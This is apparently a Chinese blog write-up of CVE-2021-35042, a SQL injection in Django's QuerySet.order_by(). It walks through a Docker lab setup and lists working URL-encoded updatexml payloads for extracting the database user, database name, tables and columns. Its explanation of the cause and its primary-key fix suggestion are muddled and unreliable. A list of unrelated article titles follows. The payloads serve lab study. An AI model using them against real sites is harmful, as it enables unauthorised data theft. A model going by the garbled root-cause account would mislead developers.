前言

SQL注入的原理是对web请求,表单或域名等提交查询的字符串没有进行安全检测过滤,攻击者可以拼接执行恶意SQL命令,导致用户数据泄露

漏洞原理

Django 组件存在 SQL 注入漏洞,该漏洞是由于对 QuerySet.order_by()中用户提供数据的过滤不足,攻击者可利用该漏洞在未授权的情况下,构造恶意数据执行 SQL 注入攻击,最终造成服务器敏感信息泄露。

以下是我自己的理解,根据Django使用的框架中,他创建了apps.py并执行,会自动生成一个models.py

models.py调用了Collection的这个类

然后发送到了这边,而models又需要migrations来迁移文件,其中调用了models.AutoField,而它如果在没有增加id这个字段的时候,会自动增加一个自增的数据库类型的字段id,但恰恰在此需要设为主键(primary_key=True)否则又会报错,导致错误将id设置为主键,可以执行SQL命令且没有被过滤

所以当order==id时会出现一个自增序列的数据(可以是ID也是等于id)

而当order=-ID又会出现问题,而打印出一些敏感信息

*影响版本

Django 3.2

Django 3.1

环境搭建

靶机: 192.168.31.230

yum-config-manager --add-repo https://mirrors.aliyun.com/docker-ce/linux/centos/docker-ce.repo //下载阿里的镜像yum源

yum install docker-ce docker-ce-cli contaninerd.io

wget https://github.com/docker/compose/releases/download/1.25.0-rc4/docker-compose-Linux-x86_64 //下载docker-compose

service docker start

详细docker搭建请参考此链接:https://www.cnblogs.com/BlogVice-2203/p/16977227.html

将CVE-2021-35042上传到centos7

docker-compose build

docker-compose up -d  //启动漏洞环境

环境启动成功后,查看http://your-ip:8000访问首页

构造poc

查当前用户

?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20user())),1)%23



查当前数据库

?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20database())),1)%23



查表

?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())),1)%23



查字段

?order=vuln_collection.name);select%20updatexml(1,concat(0x5c,(select%20column_name%20from%20information_schema.columns%20where%20table_name=%27users%27%20limit%200,1),0x5c),1)%23



查字段

?order=vuln_collection.name);select%20updatexml(1,concat(0x5c,(select%20column_name%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=%27vuln_collection%27limit%201,1),0x5c),1)%23



查数据

?order=vuln_collection.name);select%20updatexml(1,concat(0x5c,(select%20column_name%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=%27vuln_collection%27limit%201,1),0x5c),1)%23

修复建议

1.将除了id以外的其他字段其中一个设置为主键(我自己对AutoField()的理解),这样或许可以避免id成为主键自增,在数据库中就没有了主键id,就不会导致SQL注入产生

2.更新最新版本

最新文章

  1. ASP.NET MVC Model验证(一)
  2. Leveldb之version与version_set详细对比
  3. Get Start StrangeIOC for Unity3D
  4. Chapter 11 迪米特法则
  5. Linux文件挂载命令mount
  6. 浅谈angularJS指令的属性
  7. Linux 基本操作--文件查看 (day3)
  8. SSM框架中spring的XML文件配置
  9. Gulp简明使用教程
  10. Python多继承之MRO算法
  11. Redis 哨兵
  12. 第三周结对项目--小学生四则运算CAI软件汇报及总结(UI/web)
  13. Go linux 实践2
  14. 学习笔记之Python for Data Analysis
  15. ajax无刷新获取天气信息
  16. bzoj4641 基因改造 KMP / hash
  17. 1.1 、Django 后台
  18. cratedb 基本试用
  19. vue.js 源代码学习笔记 ----- observe
  20. Javascript面向对象编程(转)

热门文章

  1. Node.js(六)MongoDB
  2. Libgdx游戏开发(2)——接水滴游戏实现
  3. TensorFlow搭建模型方式总结
  4. 2022-08-11-emo了
  5. 如何在Spring Boot开启事务
  6. Docker基础和常用命令
  7. Istio Ambient Mesh七层服务治理图文详解
  8. onps栈使用说明(1)——API接口手册
  9. c#使用Bitmap绘图的时候,内存增大问题
  10. Jenkins发版通知企业微信机器人